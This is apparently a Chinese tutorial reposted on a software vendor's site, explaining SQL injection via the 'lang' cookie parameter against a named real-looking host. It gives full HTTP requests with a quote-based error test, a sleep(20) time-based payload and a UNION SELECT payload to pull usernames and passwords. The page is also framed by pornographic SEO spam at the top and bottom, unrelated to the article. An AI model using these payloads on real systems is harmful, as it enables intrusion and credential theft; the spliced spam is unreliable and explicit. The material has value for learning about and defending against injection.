公交车上荫蒂添的好舒服的电影-公用玩物(np双xing总受)-公用小荡货芊芊-公与妇仑乱hd-攻把受做哭边走边肉楼梯play-古装一级淫片a免费播放口

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

通過cookie中的參數所引發的sql注入

admin
2024年7月20日 21:33 本文熱度 1105

通過cookie中的參數所引發的sql注入

前言

在請求的cookie參數中,有一個名為lang的參數存在SQL注入漏洞。

在這個參數中注入一個單引號(')時,會引發SQL語法錯誤;而注入第二個單引號后,錯誤會消失。這表明參數中的輸入沒有正確地進行轉義或過濾,從而使得惡意的SQL代碼得以執行。

正文

正常情況下和受到攻擊時的請求示例:

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

受到sql注入攻擊時候的請求

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en'; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

報錯如下:

當然也可以使用 查詢語句:

'%2b(select*from(select(sleep(20)))a)%2b'

將構造好的查詢注入到原始的HTTP請求中,發送給目標服務器。注入點是請求的cookie參數lang:


GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en%2b(select*from(select(sleep(20)))a)%2b; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

發送請求后,觀察服務器的響應時間。如果服務器在處理請求時出現明顯的延遲(如20秒),則表明注入的查詢被服務器執行了。這個時間延遲是由SQL中的SLEEP(20)函數引起的。

確認sql注入存在以后 ,進行漏洞利用

攻擊者可以構造各種惡意SQL查詢來竊取或修改數據。例如,通過以下查詢來竊取用戶信息:

' UNION SELECT username, password FROM users --

發送惡意請求 攻擊者將惡意查詢注入到lang參數中,并發送請求:

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en' UNION SELECT username, password FROM users -- ; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1

攻擊者檢查服務器的響應,查看是否包含用戶數據。如果成功,攻擊者就能夠獲取數據庫中的敏感信息。



該文章在 2024/7/23 21:39:14 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 国产爽死777手机版日韩 | 国产激情无码一区二区 | 91麻豆精品国产高清在线 | 成人无码色情a片www性教 | 国产一级一级毛片真人视频 | 国产萝控精品福利视频免费观看 | 国产嫖妓一区二区三区无码 | av无码一区二区大桥未久 | 99精品国产免费久久国语 | heyzo无码中文字幕人妻 | 国产精品v毛片免费看观看 国产精品v毛片免费看视频 | 国产三级观看 | 高清欧美日韩一区二区三区在线 | 东京热男人av天堂 | 国产极品粉嫩馒头一线天图片 | 91蜜桃国产 | 国产精品白丝喷水在线观看者相 | 国产成人精品亚洲日本 | 精品国产a一级黄色片 | 91精品亚洲国 | 激情综合一区二区三区 | 91性高湖久久久久久久久 | 国产熟睡乱子伦视频在线播放 | 2025精品一卡二卡3卡4卡 | 国产欧美日本一区二区三区免费 | 国产av国片精品jk制服无码 | 国产高清在线精品 | 成人α片免费视频在线观看 | 高清无码影视 | 精品日本三级在线观看 | 国产日韩亚洲中文在线 | 99久久久无码国产精精品 | 精品国产免费久久无码 | 国产无套粉嫩白浆 | 国产精品爽爽久久久久久蜜臀 | 成人在线观看丁香 | 成年午夜一级毛片视频 | 国产精品亚洲日韩av在线 | 国产成人无码一区二区在线观看 | 国产精品制服丝袜美 | 国产无套视频在线观看aa在线 |